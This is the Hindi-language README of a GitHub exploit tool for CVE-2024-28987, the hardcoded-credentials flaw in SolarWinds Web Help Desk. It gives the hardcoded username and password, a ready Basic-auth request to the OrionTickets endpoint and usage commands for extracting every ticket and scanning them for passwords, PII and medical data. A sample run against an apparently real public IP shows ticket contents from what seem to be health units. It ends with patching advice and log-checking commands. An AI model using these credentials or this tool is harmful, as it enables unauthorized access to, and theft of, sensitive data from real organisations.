
CVE-2024-28987 — Updated!
**CVE-2024-28987** SolarWinds Web Help Desk (WHD) में एक गंभीर भेद्यता है जो दूरस्थ हमलावरों को **हार्डकोडेड क्रेडेंशियल्स** का उपयोग करके संवेदनशील टिकट जानकारी तक पहुंचने की अनुमति देती है। इस भेद्यता का **CVSS स्कोर 9.1 (गंभीर)** है और इसका सक्रिय रूप से वास्तविक दुनिया में शोषण किया जा रहा है।
CVE-2024-28987 - SolarWinds Web Help Desk हार्डकोडेड क्रेडेंशियल्स शोषण
⚠️ अस्वीकरण: यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। इस टूल का उपयोग केवल उन सिस्टमों पर करें जिनके स्वामी आप हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास है।
📋 अवलोकन
CVE-2024-28987 SolarWinds Web Help Desk (WHD) में एक गंभीर भेद्यता है जो दूरस्थ हमलावरों को हार्डकोडेड क्रेडेंशियल्स का उपयोग करके संवेदनशील टिकट जानकारी तक पहुंचने की अनुमति देती है। इस भेद्यता का CVSS स्कोर 9.1 (गंभीर) है और इसका सक्रिय रूप से वास्तविक दुनिया में शोषण किया जा रहा है।
भेद्यता विवरण
| विशेषता | मान |
|---|---|
| CVE ID | CVE-2024-28987 |
| CVSS स्कोर | 9.1 (गंभीर) |
| CWE | CWE-798 (हार्डकोडेड क्रेडेंशियल्स) |
| प्रभावित उत्पाद | SolarWinds Web Help Desk ≤ 12.8.3 हॉटफिक्स 1 |
| पैच किया गया संस्करण | 12.8.3 हॉटफिक्स 2 |
| शोषण | वास्तविक दुनिया में सक्रिय रूप से शोषित |
| CISA KEV में जोड़ा गया | 15 अक्टूबर, 2024 |
प्रभाव
एक अनधिकृत हमलावर यह कर सकता है:
- संवेदनशील जानकारी वाले सभी समर्थन टिकटों तक पहुंच सकता है
- अस्थायी पासवर्ड, रीसेट अनुरोध और साझा सेवा क्रेडेंशियल्स देख सकता है
/OrionTicketsएंडपॉइंट के माध्यम से टिकटों पर CRUD संचालन कर सकता है- संभावित रूप से नेटवर्क में अन्य सिस्टम तक पहुंच सकता है
🔧 विशेषताएं
- ✅ स्वचालित भेद्यता पहचान - हार्डकोडेड क्रेडेंशियल्स के लिए परीक्षण करता है
- ✅ टिकट निष्कर्षण - कमजोर सिस्टम से सभी टिकट प्राप्त करता है
- ✅ संवेदनशील डेटा स्कैनिंग - पासवर्ड, क्रेडेंशियल्स, PII और चिकित्सा डेटा की पहचान करता है
- ✅ कई आउटपुट प्रारूप - बड़े डेटासेट के लिए JSON और JSONL
- ✅ इंटरैक्टिव पूर्वावलोकन - निष्कर्षण से पहले पहले 3 टिकट दिखाता है
- ✅ शून्य निर्भरताएं - केवल Python मानक लाइब्रेरी का उपयोग करता है
- ✅ रंगीन आउटपुट - ANSI रंगों के साथ बेहतर पठनीयता
- ✅ त्रुटि प्रबंधन - कनेक्शन त्रुटियों का सुचारू प्रबंधन
🚀 त्वरित प्रारंभ
पूर्वापेक्षाएँ
- Python 3.6 या उच्चतर
- कोई बाहरी निर्भरता आवश्यक नहीं है!
स्थापना
# रिपॉजिटरी क्लोन करें
git clone https://github.com/Darabium/CVE-2024-28987.git
cd CVE-2024-28987
# स्क्रिप्ट को निष्पादन योग्य बनाएं
उपयोग
bash
# तर्क के रूप में लक्ष्य URL के साथ
python3 cve-2024-28987.py http://target-ip:port
# इंटरैक्टिव मोड (लक्ष्य के लिए संकेत देगा)
python3 cve-2024-28987.py
# कमजोर लक्ष्य के साथ उदाहरण
python3 cve-2024-28987.py http://192.168.1.100:8098
📊 आउटपुट उदाहरण
bash
$ python3 cve-2024-28987.py http://138.94.193.65:8098
╔══════════════════════════════════════════════════════════════════╗
║ ║
║ ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██╗ ██╗███████╗ ║
║ ██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗██║ ██║██╔════╝ ║
║ ██║ ██║ ██║█████╗ █████╔╝██║██╔██║███████║█████╗ ║
║ ██║ ╚██╗ ██╔╝██╔══╝ ██╔═══╝ ████╔╝██║██╔══██║██╔══╝ ║
║ ╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝██║ ██║███████╗ ║
║ ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝ ║
║ ║
║ CVE-2024-28987 - SolarWinds Web Help Desk ║
║ हार्डकोडेड क्रेडेंशियल्स भेद्यता ║
║ ║
╠══════════════════════════════════════════════════════════════════╣
║ GitHub: https://github.com/Darabium ║
╚══════════════════════════════════════════════════════════════════╝
[*] जाँच की जा रही है: http://****:**/helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/
[+] लक्ष्य कमजोर है!
[+] 42 टिकट मिले
======================================================================
[📋] टिकट पूर्वावलोकन (पहले 3 टिकट)
======================================================================
टिकट #1
├── ID: 5690
├── ग्राहक: UBS Portao Vermelho
├── स्थिति: खुला
├── विवरण: BOA TARDE ENCAMINHO SOLICITAÇÃO DE MATERIAIS DA ODONTO
टिकट #2
├── ID: 5691
├── ग्राहक: UBS Centro
├── स्थिति: प्रगति पर
├── विवरण: ALCOOL 70% - Solicitação de material de limpeza
======================================================================
[🔐] संवेदनशील डेटा के लिए स्कैनिंग
======================================================================
[!] टिकट #5723 में संभावित PASSWORD डेटा मिला
└── विवरण: कृपया सिस्टम एक्सेस के लिए मेरा पासवर्ड रीसेट करें...
[?] क्या आप सभी टिकटों को फ़ाइल में निकालना चाहते हैं? [y/N]: y
[*] सहेजा जा रहा है: 138_94_193_65_8098_tickets.json
[✓] 138_94_193_65_8098_tickets.json सफलतापूर्वक सहेजा गया
[*] फ़ाइल आकार: 42,847 बाइट्स
[*] कुल टिकट: 42
[*] हो गया!
GitHub: https://github.com/Darabium
📁 फ़ाइल संरचना
CVE-2024-28987/
├── cve-2024-28987.py # मुख्य शोषण स्क्रिप्ट
├── README.md # यह फ़ाइल
└── LICENSE # MIT लाइसेंस
आउटपुट फ़ाइलें
जब आप टिकट निकालते हैं, तो निम्नलिखित फ़ाइलें बनाई जाती हैं:
मानक JSON प्रारूप (हमेशा बनाया जाता है)
138_94_193_65_8098_tickets.json
JSONL प्रारूप (यदि > 100 टिकट हों तो बनाया जाता है)
***_tickets.jsonl 🔍 तकनीकी विवरण हार्डकोडेड क्रेडेंशियल्स python USERNAME = "helpdeskIntegrationUser" PASSWORD = "dev-C4F8025E7" प्रभावित एंडपॉइंट text /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ नमूना HTTP अनुरोध http GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1 Host: vulnerable-target:8098 Authorization: Basic aGVscGRlc2tJbnRlZ3JhdGlvblVzZXI6ZGV2LUM0ZjgwMjVFNw== Content-Type: application/x-www-form-urlencoded 🛡️ उपचार तत्काल कार्रवाई SolarWinds Web Help Desk संस्करण 12.8.3 हॉटफिक्स 2 या बाद के संस्करण में तुरंत अपडेट करें
/OrionTickets एंडपॉइंट तक संदिग्ध पहुंच के लिए लॉग जांचें
टिकट डेटा तक अनधिकृत पहुंच की निगरानी करें
टिकटों में उजागर हो सकने वाले सभी क्रेडेंशियल्स रीसेट करें
संभावित डेटा रिसाव के लिए सभी समर्थन टिकटों की समीक्षा करें
पहचान कमांड bash
लॉग में शोषण प्रयासों की जांच करें
grep -i "OrionTickets" /var/log/webhelpdesk/access.log
अनधिकृत पहुंच पैटर्न की जांच करें
grep -i "helpdeskIntegrationUser" /var/log/webhelpdesk/access.log
वर्तमान संस्करण जांचें
cat /opt/WebHelpDesk/version.txt 🚨 CISA KEV सलाह इस भेद्यता को CISA की ज्ञात शोषित भेद्यताओं (KEV) सूची में जोड़ा गया है। संगठनों को निर्दिष्ट समय सीमा तक पैच करना आवश्यक है।
जोड़ने की तिथि: 15 अक्टूबर, 2024
आवश्यक कार्रवाई: विक्रेता निर्देशों के अनुसार अपडेट लागू करें
समय सीमा: 5 नवंबर, 2024 (21 दिन)
📚 संदर्भ NVD CVE-2024-28987
CISA KEV कैटलॉग
SolarWinds सुरक्षा सलाह
PEP 668 - बाहरी पर्यावरण प्रबंधन
🤝 योगदान योगदान का स्वागत है! कृपया बेझिझक पुल अनुरोध सबमिट करें या मुद्दे खोलें।
दिशानिर्देश रिपॉजिटरी को फोर्क करें
अपनी फीचर शाखा बनाएं (git checkout -b feature/AmazingFeature)
अपने परिवर्तन कमिट करें (git commit -m 'Add some AmazingFeature')
शाखा को पुश करें (git push origin feature/AmazingFeature)
पुल अनुरोध खोलें
📝 लाइसेंस यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
⚡ लेखक Darabium - प्रारंभिक कार्य - GitHub
⚠️ महत्वपूर्ण नोट यह टूल सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है
उन सिस्टमों पर उपयोग न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है
लेखक इस टूल के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है
हमेशा जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें
अपने क्षेत्राधिकार में गोपनीयता और डेटा सुरक्षा कानूनों का सम्मान करें
🌟 स्टार इतिहास यदि आपको यह टूल उपयोगी लगता है, तो कृपया इसे GitHub पर ⭐ दें!
📞 समर्थन बग रिपोर्ट के लिए GitHub पर एक मुद्दा खोलें
सुरक्षा चिंताओं के लिए, कृपया GitHub के माध्यम से सीधे संपर्क करें
Darabium के लिए ❤️ के साथ बनाया गया